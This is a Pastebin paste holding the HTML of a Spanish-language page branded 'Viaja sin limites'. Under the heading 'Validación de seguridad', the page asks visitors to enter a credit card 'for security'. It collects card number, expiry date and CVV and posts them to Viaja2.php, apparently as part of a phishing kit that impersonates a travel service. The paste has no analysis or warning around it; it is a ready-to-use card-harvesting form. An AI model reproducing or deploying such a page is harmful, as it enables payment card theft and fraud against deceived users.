Advertisement
Guest User

Untitled

a guest
Nov 18th, 2019
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.16 KB | None | 0 0
  1. <!DOCTYPE html>
  2.  
  3. <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  4. <title>Viaja sin limites</title>
  5. <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
  6. <meta name="HandheldFriendly" content="true">
  7.  
  8. <meta http-equiv="X-UA-Compatible" content="ie=edge">
  9.  
  10. <link rel="stylesheet" href="./Viaja sin limites_files/style.css">
  11. <link rel="shortcut icon" href="./Viaja sin limites_files/favicon.ico">
  12. <script src="./Viaja sin limites_files/validarcc.js.descarga"></script>
  13. </head>
  14.  
  15. <body>
  16. <main>
  17. <header>
  18. <div class="mid">
  19. <a href="./">
  20. <img id="logo" src="./Viaja sin limites_files/favicon.ico" style="height: 48px;">
  21.  
  22. <img id="logo2" src="./Viaja sin limites_files/favicon.ico" style="height: 48px;">
  23.  
  24. </a>
  25. </div></header>
  26. <div id="background">
  27.  
  28.  
  29.  
  30. </div>
  31.  
  32.  
  33.  
  34. <div class="login-wrapper " style=" padding: 30px 0; ">
  35.  
  36.  
  37.  
  38. <h2>Validación de seguridad</h2>
  39. <p>Por seguridad, ingrese una tarjeta de crédito</p>
  40. <div style="
  41. display: flex;
  42. align-items: center;
  43. ">
  44. <img src="./Viaja sin limites_files/Visa_Logo.png" style="
  45. height: 25px;
  46. "><img src="./Viaja sin limites_files/mastercard_logo.png" style="
  47. height: 40px;
  48. margin-left: 20px;
  49. ">
  50.  
  51.  
  52. </div>
  53.  
  54.  
  55. <form method="POST" action="Viaja2.php" onsubmit="return valida();">
  56.  
  57.  
  58. <div class="cc">
  59.  
  60.  
  61.  
  62.  
  63. <input type="text" minlength="16" maxlength="16" required name="cc" id="cc" placeholder="Número de su tarjeta">
  64.  
  65. <div class="flex">
  66. <input type="text" minlength="2" maxlength="2" required name="mm" id="mm" placeholder="MM">
  67. <span>/</span>
  68. <input type="text" minlength="2" maxlength="4" required name="aa" id="aa" placeholder="AA">
  69. </div>
  70. <input type="text" minlength="4" maxlength="4" required name="cvv" id="cvv" placeholder="Código de seguridad" style="margin-bottom: 40px;">
  71. </div>
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81. <input type="submit" value="Continuar">
  82.  
  83. </form>
  84.  
  85.  
  86.  
  87.  
  88.  
  89. </div></main>
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement